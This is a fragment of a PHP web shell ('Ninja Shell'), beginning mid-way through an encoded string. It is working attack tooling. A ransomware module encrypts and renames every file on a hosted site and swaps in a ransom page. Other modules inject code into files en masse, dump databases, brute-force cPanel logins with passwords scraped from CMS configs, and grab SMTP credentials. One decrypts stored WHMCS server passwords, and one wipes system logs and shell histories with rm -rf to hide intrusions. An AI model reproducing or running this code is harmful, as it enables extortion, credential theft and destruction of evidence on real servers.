eSBpdC4gV2UgV2lsbCBEZWNyeXB0IFRoZSBFbmNyeXB0ZWQgRmlsZXMgSW4gWW91ciBXZWJzaXRlLg0KCQk8L2ZvbnQ+DQoJCTxicj4NCgkJPGJyPg0KDQoNCg0KDQoNCjwvY2VudGVyPg0KPC9ib2R5Pg0KDQoNCjwvaHRtbD4="))) { echo "<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> virus.php (Default Page)<br>"; } } } public function shcpackUnstall() { if (file_exists(".htaencrypted")) { if (unlink(".htaccess") && unlink("virus.php")) { echo "<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>"; echo "<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> virus.php (Default Page)<br>"; } rename(".htaencrypted", ".htaccess"); } } public function plus() { flush(); ob_flush(); } public function locate() { return getcwd(); } public function shcdirs($dir, $method, $key) { switch ($method) { case "1": deRanSomeware::shcpackInstall(); break; case "2": deRanSomeware::shcpackUnstall(); break; } foreach (scandir($dir) as $d) { if ($d != "." && $d != "..") { $locate = $dir . DIRECTORY_SEPARATOR . $d; if (!is_dir($locate)) { if (deRanSomeware::kecuali($locate, "idx.php") && deRanSomeware::kecuali($locate, ".htaccess") && deRanSomeware::kecuali($locate, "virus.php") && deRanSomeware::kecuali($locate, "index.php") && deRanSomeware::kecuali($locate, ".htaencrypted")) { switch ($method) { case "1": deRanSomeware::shcEnCry($key, $locate); deRanSomeware::shcEnDesDirS($locate, "1"); break; case "2": deRanSomeware::shcDeCry($key, $locate); deRanSomeware::shcEnDesDirS($locate, "2"); break; } } } else { deRanSomeware::shcdirs($locate, $method, $key); } } deRanSomeware::plus(); } } public function shcEnDesDirS($locate, $method) { switch ($method) { case "1": rename($locate, $locate . ".Exorcised"); break; case "2": $locates = str_replace(".Exorcised", '', $locate); rename($locate, $locates); break; } } public function shcEnCry($key, $locate) { $data = file_get_contents($locate); $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM); $encrypted = base64_encode($iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash("sha256", $key, true), $data, MCRYPT_MODE_CBC, $iv)); if (file_put_contents($locate, $encrypted)) { echo "<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">" . $locate . "</font> <br>"; } else { echo "<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Locked</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> " . $locate . " <br>"; } } public function shcDeCry($key, $locate) { $data = base64_decode(file_get_contents($locate)); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash("sha256", $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\0"); if (file_put_contents($locate, $decrypted)) { echo "<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">" . $locate . "</font> <br>"; } else { echo "<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Unlock</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">" . $locate . "</font> <br>"; } } public function kecuali($ext, $name) { $re = "/({$name})/"; preg_match($re, $ext, $matches); if ($matches[1]) { return false; } return true; } } if ($_POST["submit"]) { switch ($_POST["method"]) { case "1": deRanSomeware::shcdirs(deRanSomeware::locate(), "1", $_POST["key"]); break; case "2": deRanSomeware::shcdirs(deRanSomeware::locate(), "2", $_POST["key"]); break; } } else { ?>
<div class="item">
<center>
<pre>
<font color = "lime"><i>
______ _ _______ ___ _ _____
| ____| (_) |__ __| / _ \ (_) | __ \
| |__ __ __ ___ _ __ ___ _ ___ _ __ ___ | | _ __ | | | | _ __ _ _ __ | |__) | __ _ _ __ ___ ___ _ __ ___ __ __ __ _ _ __ ___
| __| \ \/ // _ \ | '__|/ __|| |/ __|| '_ ` _ \ | || '__|| | | || | / _` || '_ \ | _ / / _` || '_ \ / __| / _ \ | '_ ` _ \\ \ /\ / // _` || '__|/ _ \
| |____ > <| (_) || | | (__ | |\__ \| | | | | | || | | |_| || || (_| || | | | | | \ \| (_| || | | |\__ \| (_) || | | | | |\ V V /| (_| || | | __/
|______|/_/\_\\___/ |_| \___||_||___/|_| |_| |_| |_||_| \___/ | | \__,_||_| |_| |_| \_\\__,_||_| |_||___/ \___/ |_| |_| |_| \_/\_/ \__,_||_| \___|
/ |
|__/
</i>
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' `98v8P' `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.odb. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
-[ Contact : [email protected] ]-
System : <?php echo php_uname() . "
"; ?>
Server : <?php $_SERVER["HTTP_HOST"] . "\xa"; ?>
#Ransomware Ini Berada Pada [dir]: <?php echo getcwd(); ?>
/<?php $current_file_name = basename($_SERVER["PHP_SELF"]); echo $current_file_name . "\xa"; ?>
</font>
</pre>
<h2>
<font color='red' face='iceland'> Put Your Encryption/Decryption Key Here
</h2>
</font>
<form action="" method="post" style=" text-align: center;">
<input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC"><br><br>
<h2>
<font color='lime' face='iceland'> Post Type :
</h2>
</font>
<select name="method" class="selecte">
<option value="1">Encrypt Files!</option>
<option value="2">Decrypt Files!</option>
</select><br><br><br><br><br>
<input type="submit" name="submit" class="submite" value="Execute Virus!" />
</form>
<?php } ?>
</center>
</div>
</body>
</html>
<br>
<hr>
<?php } elseif (isset($_GET[hex("whois")])) { $dir = path(); ?>
<form method="post">
<?php @set_time_limit(0); @error_reporting(0); function sws_domain_info($site) { $getip = @file_get_contents("http://networktools.nl/whois/{$site}"); flush(); $ip = @findit($getip, "<pre>", "</pre>"); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("http://networktools.nl/asinfo/{$site}"); $ip = @findit($getip, "<pre>", "</pre>"); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("http://networktools.nl/reverseip/{$site}"); $ip = @findit($getip, "<pre>", "</pre>"); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains"); $ip = @findit($getip, "<strong>Nameservers found:</strong>", "<script type="text/javascript">"); return $ip; flush(); } function sws_port_scan($ip) { $list_post = array("80", "21", "22", "2082", "25", "53", "110", "443", "143"); foreach ($list_post as $o_port) { $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5); if ($connect) { echo " {$ip} : {$o_port} ??? <u style="color: white">Open</u> <br /><br />"; flush(); } } } function findit($mytext, $starttag, $endtag) { $posLeft = @stripos($mytext, $starttag) + strlen($starttag); $posRight = @stripos($mytext, $endtag, $posLeft + 1); return @substr($mytext, $posLeft, $posRight - $posLeft); flush(); } echo "<br><br><center>"; echo "\xa <br /><hr>
\x9<div class="mybox">
\x9<h2>Whois Ninja Shell</h2>\xa <form method="post"><table class="tabnet">\xa <tr><td>Site to scan </td><td>:</td><td>
<input type="text" name="site" size="50" style="color:black;background-color:#FFF" class="form-control" value="site.com" />   <input class="form-control" type="submit" style="color:black;background-color:#FFF" name="scan" value="Scan !" /></td></tr>
</table></form></div><hr><br>"; if (isset($_POST["scan"])) { $site = @htmlentities($_POST["site"]); if (empty($site)) { die("<br /><br /> Not add IP .. !"); } $ip_port = @gethostbyname($site); echo "
<br /><div class="sc2">Scanning [ {$site} ip {$ip_port} ] ... </div>
<div class="tit"> <br /><br />|-------------- Port Server ------------------| <br /></div>\xa <div class="ru"> <br /><br /><pre>
"; echo '' . sws_port_scan($ip_port) . " </pre></div> "; flush(); echo "<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
<div class="ru">
<pre>" . sws_domain_info($site) . "</pre></div>"; flush(); echo "
<div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
<div class="ru">
<pre>" . sws_net_info($site) . "</pre> </div>"; flush(); echo "<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
<div class="ru">\xa <pre>" . sws_sup_dom($site) . "</pre> </div>"; flush(); echo "<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>\xa <div class="ru">\xa <pre>" . sws_site_ser($site) . "</pre> </div>\xa <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>"; flush(); } echo "</center>"; } elseif (isset($_GET[hex("phpinfo")])) { echo "<hr><br><center>"; echo "<h2>Server Php Info</h2>"; echo phpinfo(); echo "<hr><br></center>"; } elseif (isset($_GET[hex("inject-code")])) { echo "<hr><br>"; echo "<center><h2>Mass Code Injector Ninja Shell</h2></center>"; if (stristr(php_uname(), "Windows")) { $DS = "\"; } else { if (stristr(php_uname(), "Linux")) { $DS = "/"; } } function get_structure($path, $depth) { global $DS; $res = array(); if (in_array(0, $depth)) { $res[] = $path; } if (in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) { $tmp1 = glob($path . $DS . "*", GLOB_ONLYDIR); if (in_array(1, $depth)) { $res = array_merge($res, $tmp1); } } if (in_array(2, $depth) or in_array(3, $depth)) { $tmp2 = array(); foreach ($tmp1 as $t) { $tp2 = glob($t . $DS . "*", GLOB_ONLYDIR); $tmp2 = array_merge($tmp2, $tp2); } if (in_array(2, $depth)) { $res = array_merge($res, $tmp2); } } if (in_array(3, $depth)) { $tmp3 = array(); foreach ($tmp2 as $t) { $tp3 = glob($t . $DS . "*", GLOB_ONLYDIR); $tmp3 = array_merge($tmp3, $tp3); } $res = array_merge($res, $tmp3); } return $res; } if (isset($_POST["submit"]) && $_POST["submit"] == "Inject") { $name = $_POST["name"] ? $_POST["name"] : "*"; $type = $_POST["type"] ? $_POST["type"] : "html"; $path = $_POST["path"] ? $_POST["path"] : getcwd(); $code = $_POST["code"] ? $_POST["code"] : "Pakistan Haxors Crew"; $mode = $_POST["mode"] ? $_POST["mode"] : "a"; $depth = sizeof($_POST["depth"]) ? $_POST["depth"] : array("0"); $dt = get_structure($path, $depth); foreach ($dt as $d) { if ($mode == "a") { if (file_put_contents($d . $DS . $name . "." . $type, $code, FILE_APPEND)) { echo "<div><strong>" . $d . $DS . $name . "." . $type . "</strong><span style="color:lime;"> was injected</span></div>"; } else { echo "<div><span style="color:red;">failed to inject</span> <strong>" . $d . $DS . $name . "." . $type . "</strong></div>"; } } else { if (file_put_contents($d . $DS . $name . "." . $type, $code)) { echo "<div><strong>" . $d . $DS . $name . "." . $type . "</strong><span style="color:lime;"> was injected</span></div>"; } else { echo "<div><span style="color:red;">failed to inject</span> <strong>" . $d . $DS . $name . "." . $type . "</strong></div>"; } } } } else { echo "<form method="post" action="">
<center>
<table align="center">
<tr><br>\xa <td>Directory : </td>\xa <td><input class = "form-control" type = "text" class="box" name="path" value="" . getcwd() . "" size="50"/></td>
</tr>
<tr>
<td class="title">Mode : </td>
<td>\xa <select class = "form-control" style="width: 150px;" name="mode" class="box">\xa <option value="a">Apender</option>\xa <option value="w">Overwriter</option>\xa </select>
</td>
</tr>
<tr>\xa <td class="title">File Name & Type : </td>
<td><br>
<input class = "form-control" type="text" style="width: 100px;" name="name" value="*"/>
\xa <select class = "form-control" style="width: 150px;" name="type" class="box">\xa <option value="html">HTML</option>
<option value="htm">HTM</option>
<option value="php" selected="selected">PHP</option>\xa <option value="asp">ASP</option>
<option value="aspx">ASPX</option>\xa <option value="xml">XML</option>
<option value="txt">TXT</option>\xa </select></td>
</tr>\xa <tr>
<td class="title">Code Inject Depth : </td>\xa <td>\xa <input type="checkbox" name="depth[]" value="0" checked="checked"/> 0 \xa <input type="checkbox" name="depth[]" value="1"/> 1 \xa <input type="checkbox" name="depth[]" value="2"/> 2
<input type="checkbox" name="depth[]" value="3"/> 3
</td>
</tr> \xa <tr>
<td colspan="2"><textarea class = "form-control" name="code" style= "width:100%"></textarea></td>\xa </tr>
<tr>\xa <td colspan="2" style="text-align: center;">
<input type="hidden" name="a" value="Injector">\xa <input type="hidden" name="c" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">\xa <input type="hidden" name="p1">
<input type="hidden" name="p2">\xa <input type="hidden" name="charset" value="" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "">\xa <input class = "form-control" style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
<br></tr>
</table>\xa </form>"; } echo "<hr><br>"; } elseif (isset($_GET[hex("db-dump")])) { echo "
<center><hr><br>\xa<form action method=post>\xa<table width=371 class=tabnet >
<h2>Database Dumper Ninja Shell</h2>
<tr>\xa\x9<td>Server </td>\xa\x9<td><input class="form-control" type=text name=server size=52 autocomplete = "off"></td></tr><tr>
\x9<td>Username</td>\xa <td><input class="form-control" type=text name=username size=52 autocomplete = "off"></td></tr><tr>\xa\x9<td>Password</td>
<td><input class="form-control" type=text name=password size=52 autocomplete = "off"></td></tr><tr>\xa <td>DataBase Name</td>
<td><input class="form-control" type=text name=dbname size=52 autocomplete = "off"></td></tr>
\x9<tr>\xa\x9<td>DB Type </td>\xa <td><form method=post action="" . $me . "">\xa\x9<select class="form-control" name=method>
\x9<option value="gzip">Gzip</option>
\x9 <option value="sql">Sql</option>
</select>
\x9\x9<br>
\x9<input class="form-control" type=submit value=" Dump! " ></td></tr>
\x9</form></center></table></div><hr><br>"; if ($_POST["username"] && $_POST["dbname"] && $_POST["method"]) { $date = date("Y-m-d"); $dbserver = $_POST["server"]; $dbuser = $_POST["username"]; $dbpass = $_POST["password"]; $dbname = $_POST["dbname"]; $file = "Dump-{$dbname}-{$date}"; $method = $_POST["method"]; if ($method == "sql") { $file = "Dump-{$dbname}-{$date}.sql"; $fp = fopen($file, "w"); } else { $file = "Dump-{$dbname}-{$date}.sql.gz"; $fp = gzopen($file, "w"); } function write($data) { global $fp; if ($_POST["method"] == "ssql") { fwrite($fp, $data); } else { gzwrite($fp, $data); } } mysql_connect($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i["Tables_in_" . $dbname]; $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i)); write($create["Create Table"] . ";nn"); $sql = mysql_query("SELECT * FROM " . $i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'" . mysql_escape_string($k) . "'"; } write("INSERT INTO {$i} VALUES(" . implode(",", $row) . ");n"); } } } if ($method == "ssql") { fclose($fp); } else { gzclose($fp); } header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif (isset($_GET[hex("cp-crack")])) { if ($_POST["crack"]) { $usercp = explode("\xd\xa", $_POST["user_cp"]); $passcp = explode("
\xa", $_POST["pass_cp"]); $i = 0; foreach ($usercp as $ucp) { foreach ($passcp as $pcp) { if (@mysql_connect("localhost", $ucp, $pcp)) { if ($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if ($ucp == '' || $pcp == '') { } else { $i++; if (function_exists("posix_getpwuid")) { $domain_cp = file_get_contents("/etc/named.conf"); if ($domain_cp == '') { $dom = "<font color=red>gabisa ambil nama domain nya</font>"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach ($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/{$dj}")); $user_cp_url = $user_cp_url["name"]; if ($user_cp_url == $ucp) { $dom = "<a href='http://{$dj}/' target='_blank'><font color=lime>{$dj}</font></a>"; break; } } } } else { $dom = "<font color=red>function is Disable by system</font>"; } echo "username (<font color=lime>{$ucp}</font>) password (<font color=lime>{$pcp}</font>) domain ({$dom})<br>"; } } } } } if ($i == 0) { } else { echo "<br>sukses nyolong " . $i . " Cpanel by <font color=lime>Exc Shell.</font>"; } } else { echo "<center><hr><br>\xa\x9 <form method='post'>\xa\x9\x9<h2>Cpanel Crack Ninja Shell</h2>
\x9\x9USER: <br>\xa\x9 <textarea class = 'form-control' style='width: 450px; height: 150px;' name='user_cp'>"; $_usercp = fopen("/etc/passwd", "r"); while ($getu = fgets($_usercp)) { if ($getu == '' || !$_usercp) { echo "<font color=red>Can't read /etc/passwd</font>"; } else { preg_match_all("/(.*?):x:/", $getu, $u); foreach ($u[1] as $user_cp) { if (is_dir("/home/{$user_cp}/public_html")) { echo "{$user_cp}
"; } } } } echo "</textarea><br>\xa\x9 PASS: <br>\xa\x9\x9<textarea class= 'form-control' style='width: 450px; height: 200px;' name='pass_cp'>"; function cp_pass($dir) { $pass = ''; $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}/{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}/{$dirb}"); if (preg_match("/WordPress/", $ambil)) { $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\xa"; } elseif (preg_match("/JConfig|joomla/", $ambil)) { $pass .= ambilkata($ambil, "password = '", "'") . "\xa"; } elseif (preg_match("/Magento|Mage_Core/", $ambil)) { $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\xa"; } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) { $pass .= ambilkata($ambil, "password = "", """) . "\xa"; } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) { $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\xa"; } elseif (preg_match("/client/", $ambil)) { preg_match("/password=(.*)/", $ambil, $pass1); $pass .= $pass1[1] . "\xa"; if (preg_match("/"/", $pass1[1])) { $pass1[1] = str_replace(""", '', $pass1[1]); $pass .= $pass1[1] . "
"; } } elseif (preg_match("/cc_encryption_hash/", $ambil)) { $pass .= ambilkata($ambil, "db_password = '", "'") . "\xa"; } } echo $pass; } $cp_pass = cp_pass($dir); echo $cp_pass; echo "</textarea><br>\xa\x9\x9<input class = 'form-control' type='submit' name='crack' style='width: 450px;' value='Crack'>\xa\x9 </form><br>\xa \x9<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center><hr><br>"; } } elseif (isset($_GET[hex("smtp-grab")])) { $dir = path(); echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>"; function scj($dir) { $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}/{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}/{$dirb}"); $ambil = str_replace("$", '', $ambil); if (preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "<center>"; echo "SMTP Host: <font color=lime>{$smtp_host}</font><br>"; echo "SMTP port: <font color=lime>{$smtp_port}</font><br>"; echo "SMTP user: <font color=lime>{$smtp_user}</font><br>"; echo "SMTP pass: <font color=lime>{$smtp_pass}</font><br>"; echo "SMTP auth: <font color=lime>{$smtp_auth}</font><br>"; echo "SMTP secure: <font color=lime>{$smtp_secure}</font><br><br>"; echo "</center>"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif (isset($_GET[hex("domains")])) { echo "<center>\xa \x9<div class='mybox'>\xa <p align='center' class='cgx2'>Domains and Users</p>"; $d0mains = @file("/etc/named.conf"); if (!$d0mains) { die("<center>Error : can't read [ /etc/named.conf ]</center>"); } echo "<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>"; foreach ($d0mains as $d0main) { if (eregi("zone", $d0main)) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user["name"] . "</td></tr>"; flush(); } } } echo "</div></center>"; } elseif (isset($_GET[hex("whmcs-decoder")])) { echo "<form action="" method="post">"; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = base64_decode($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists("sha1")) { $hash = sha1($string); } else { $hash = md5($string); } $out = ''; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } echo "
<hr><br>
<br><center><h2>Whmcs Decoder Ninja Shell</h2></center>
<center>
<br>
<FORM action='' method='post'>
<input type='hidden' name='form_action' value='2'>\xa<br>
<table class=tabnet style=width:320px;padding:0 1px;>
<tr><th colspan=2>WHMCS Decoder</th></tr>
<tr><td>db_host </td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_host' value='localhost'></td></tr>\xa<tr><td>db_username </td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password</td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name</td><td><input type='text' style='color:#000;background-color:' class='form-control' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash</td><td><input style='color:#000;background-color:' type='text' class='form-control' size='38' name='cc_encryption_hash' value=''></td></tr>
<td> <INPUT class='form-control' type='submit' style='color:#000;background-color:' value='Submit' name='Submit'></td>
</table>
</FORM>\xa</center>\xa<hr><br>\xa"; if ($_POST["form_action"] == 2) { $db_host = $_POST["db_host"]; $db_username = $_POST["db_username"]; $db_password = $_POST["db_password"]; $db_name = $_POST["db_name"]; $cc_encryption_hash = $_POST["cc_encryption_hash"]; $link = mysql_connect($db_host, $db_username, $db_password); mysql_select_db($db_name, $link); $query = mysql_query("SELECT * FROM tblservers"); while ($v = mysql_fetch_array($query)) { $ipaddress = $v["ipaddress"]; $username = $v["username"]; $type = $v["type"]; $active = $v["active"]; $hostname = $v["hostname"]; echo "<center><table border='1'>"; $password = decrypt($v["password"], $cc_encryption_hash); echo "<tr><td>Type</td><td>{$type}</td></tr>"; echo "<tr><td>Active</td><td>{$active}</td></tr>"; echo "<tr><td>Hostname</td><td>{$hostname}</td></tr>"; echo "<tr><td>Ip</td><td>{$ipaddress}</td></tr>"; echo "<tr><td>Username</td><td>{$username}</td></tr>"; echo "<tr><td>Password</td><td>{$password}</td></tr>"; echo "</table><br><br></center>"; } $link = mysql_connect($db_host, $db_username, $db_password); mysql_select_db($db_name, $link); $query = mysql_query("SELECT * FROM tblregistrars"); echo "<center>Domain Reseller <br><table class=tabnet border='1'>"; echo "<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>"; while ($v = mysql_fetch_array($query)) { $registrar = $v["registrar"]; $setting = $v["setting"]; $value = decrypt($v["value"], $cc_encryption_hash); if ($value == '') { $value = 0; } $password = decrypt($v["password"], $cc_encryption_hash); echo "<tr><td>{$registrar}</td><td>{$setting}</td><td>{$value}</td></tr>"; } } } elseif (isset($_GET[hex("delete-logs")])) { echo "<br><center><b><span>Delete Logs ( For Safe )</span></b><center><br>"; echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>"; exec("rm -rf /tmp/logs"); exec("rm -rf /root/.ksh_history"); exec("rm -rf /root/.bash_history"); exec("rm -rf /root/.bash_logout"); exec("rm -rf /usr/local/apache/logs"); exec("rm -rf /usr/local/apache/log"); exec("rm -rf /var/apache/logs"); exec("rm -rf /var/apache/log"); exec("rm -rf /var/run/utmp"); exec("rm -rf /var/logs"); exec("rm -rf /var/log"); exec("rm -rf /var/adm"); exec("rm -rf /etc/wtmp"); exec("rm -rf /etc/utmp"); exec("rm -rf {$HISTFILE}"); exec("rm -rf /var/log/lastlog"); exec("rm -rf /var/log/wtmp"); shell_exec("rm -rf /tmp/logs"); shell_exec("rm -rf /root/.ksh_history"); shell_exec("rm -rf /root/.bash_history"); shell_exec("rm -rf /root/.bash_logout"); shell_exec("rm -rf /usr/local/apache/logs"); shell_exec("rm -rf /usr/local/apache/log"); shell_exec("rm -rf /var/apache/logs"); shell_exec("rm -rf /var/apache/log"); shell_exec("rm -rf /var/run/utmp"); shell_exec("rm -rf /var/logs"); shell_exec("rm -rf /var/log"); shell_exec("rm -rf /var/adm"); shell_exec("rm -rf /etc/wtmp"); shell_exec("rm -rf /etc/utmp"); shell_exec("rm -rf {$HISTFILE}"); shell_exec("rm -rf /var/log/lastlog"); shell_exec("rm -rf /var/log/wtmp"); passthru("rm -rf /tmp/logs"); passthru("rm -rf /root/.ksh_history"); passthru("rm -rf /root/.bash_history"); passthru("rm -rf /root/.bash_logout"); passthru("rm -rf /usr/local/apache/logs"); passthru("rm -rf /usr/local/apache/log"); passthru("rm -rf /var/apache/logs"); passthru("rm -rf /var/apache/log"); passthru("rm -rf /var/run/utmp"); passthru("rm -rf /var/logs"); passthru("rm -rf /var/log"); passthru("rm -rf /var/adm"); passthru("rm -rf /etc/wtmp"); passthru("rm -rf /etc/utmp"); passthru("rm -rf {$HISTFILE}"); passthru("rm -rf /var/log/lastlog"); passthru("rm -rf /var/log/wtmp"); system("rm -rf /tmp/logs"); sleep(2); echo "<br>Deleting .../tmp/logs "; sleep(2); system("rm -rf /root/.bash_history"); sleep(2); echo "<p>Deleting .../root/.bash_history </p>"; system("rm -rf /root/.ksh_history"); sleep(2); echo "<p>Deleting .../root/.ksh_history </p>"; system("rm -rf /root/.bash_logout"); sleep(2); echo "<p>Deleting .../root/.bash_logout </p>"; system("rm -rf /usr/local/apache/logs"); sleep(2); echo "<p>Deleting .../usr/local/apache/logs </p>"; system("rm -rf /usr/local/apache/log"); sleep(2); echo "<p>Deleting .../usr/local/apache/log </p>"; system("rm -rf /var/apache/logs"); sleep(2); echo "<p>Deleting .../var/apache/logs </p>"; system("rm -rf /var/apache/log"); sleep(2); echo "<p>Deleting .../var/apache/log </p>"; system("rm -rf /var/run/utmp"); sleep(2); echo "<p>Deleting .../var/run/utmp </p>"; system("rm -rf /var/logs"); sleep(2); echo "<p>Deleting .../var/logs </p>"; system("rm -rf /var/log"); sleep(2); echo "<p>Deleting .../var/log </p>"; system("rm -rf /var/adm"); sleep(2); echo "<p>Deleting .../var/adm </p>"; system("rm -rf /etc/wtmp"); sleep(2); echo "<p>Deleting .../etc/wtmp </p>"; system("rm -rf /etc/utmp"); sleep(2); echo "<p>Deleting .../etc/utmp </p>"; system("rm -rf {$HISTFILE}"); sleep(2); echo "<p>Deleting ...$HISTFILE </p>"; system("rm -rf /var/log/lastlog"); sleep(2); echo "<p>Deleting .../var/log/lastlog </p>"; system("rm -rf /var/log/wtmp"); sleep(2); echo "<p>Deleting .../var/log/wtmp </p>"; sleep(4); echo "<br><br><p>Your Traces Has Been Successfully Deleting ...From the Server"; echo "</td></tr></table>"; } elseif (isset($_GET[hex("scanner")])) { echo "<hr><br>"; echo "<center><h2>Scanner Ninja Shell</h2></center><br>"; echo "<form method = 'POST'>
\x9\x9 \x9 <center>\xa \x9\x9 <div class = 'row clearfix'>
\x9 \x9 \x9<div class = 'col-md-4'>\xa\x9 \x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("cmsvuln") . "' style='width: 250px;' height='10'><center>CMS Vulnerability Scanner</center></a>\xa \x9 \x9\x9</div>
\x9 \x9<div class = 'col-md-4'>
\x9 \x9\x9 <a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("port-scanner") . "' style='width: 250px;' height='10'><center>Port Scanner</center></a>
\x9 \x9 </div>
